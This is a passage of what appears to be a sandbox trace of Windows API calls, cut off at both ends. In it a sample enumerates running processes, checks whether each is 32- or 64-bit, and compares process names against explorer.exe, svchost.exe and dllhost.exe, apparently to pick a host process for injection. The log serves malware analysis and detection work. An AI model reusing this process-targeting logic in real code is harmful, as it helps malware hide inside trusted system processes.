(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0244.907] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0244.907] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0244.908] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0244.908] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.908] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.908] CloseHandle (hObject=0xec) returned 1 [0244.909] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0244.909] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0244.910] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.910] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.910] CloseHandle (hObject=0xec) returned 1 [0244.910] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0244.910] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0244.911] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0244.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0244.911] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.911] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.911] CloseHandle (hObject=0xec) returned 1 [0244.911] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0244.911] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0244.911] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0244.911] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0244.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0244.912] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.912] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.912] CloseHandle (hObject=0xec) returned 1 [0244.912] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0244.912] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0244.912] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0244.912] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0244.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0244.912] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.912] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.912] CloseHandle (hObject=0xec) returned 1 [0244.913] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0244.913] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0244.913] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0244.913] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0244.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0244.913] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.913] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.913] CloseHandle (hObject=0xec) returned 1 [0244.913] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0244.913] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0244.913] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0244.913] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0244.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0244.914] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.914] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.914] CloseHandle (hObject=0xec) returned 1 [0244.914] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0244.914] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0244.914] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0244.914] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0244.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0244.915] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.915] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.915] CloseHandle (hObject=0xec) returned 1 [0244.915] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0244.915] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0244.915] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0244.915] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0244.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0244.915] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.915] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.915] CloseHandle (hObject=0xec) returned 1 [0244.915] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0244.915] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0244.915] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0244.915] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0244.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0244.916] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.916] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.916] CloseHandle (hObject=0xec) returned 1 [0244.916] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0244.916] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0244.916] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0244.916] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0244.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0244.917] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.917] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.917] CloseHandle (hObject=0xec) returned 1 [0244.917] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0244.917] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0244.917] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0244.917] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0244.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0244.917] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.917] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.917] CloseHandle (hObject=0xec) returned 1 [0244.917] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0244.917] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0244.917] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0244.917] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0244.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0244.918] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.918] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.918] CloseHandle (hObject=0xec) returned 1 [0244.918] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0244.918] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0244.918] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0244.918] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0244.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0244.919] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.919] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.919] CloseHandle (hObject=0xec) returned 1 [0244.919] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0244.919] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0244.919] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0244.919] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0244.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0244.919] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.919] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.919] CloseHandle (hObject=0xec) returned 1 [0244.919] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0244.919] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0244.919] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0244.919] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0244.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0244.920] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.920] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.920] CloseHandle (hObject=0xec) returned 1 [0244.920] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0244.920] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0244.920] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0244.920] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0244.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0244.921] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.921] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.921] CloseHandle (hObject=0xec) returned 1 [0244.921] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0244.921] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0244.921] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0244.921] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0244.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0244.921] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.921] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.921] CloseHandle (hObject=0xec) returned 1 [0244.921] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0244.921] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0244.921] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0244.921] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0244.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0244.922] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.922] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.922] CloseHandle (hObject=0xec) returned 1 [0244.922] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0244.922] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0244.922] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0244.922] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0244.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0244.923] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.923] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.923] CloseHandle (hObject=0xec) returned 1 [0244.923] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0244.923] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0244.923] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0244.923] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0244.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0244.923] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.923] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.923] CloseHandle (hObject=0xec) returned 1 [0244.923] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0244.923] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0244.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0244.924] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0244.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0244.924] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.924] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.924] CloseHandle (hObject=0xec) returned 1 [0244.924] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0244.924] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0244.924] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0244.924] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0244.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0244.925] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.925] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.925] CloseHandle (hObject=0xec) returned 1 [0244.925] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0244.925] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0244.925] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0244.925] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0244.925] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0244.926] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0244.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0244.926] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0244.927] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0244.927] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0244.928] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.928] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.928] CloseHandle (hObject=0xec) returned 1 [0244.928] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0244.928] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.928] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.928] CloseHandle (hObject=0xec) returned 1 [0244.929] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: 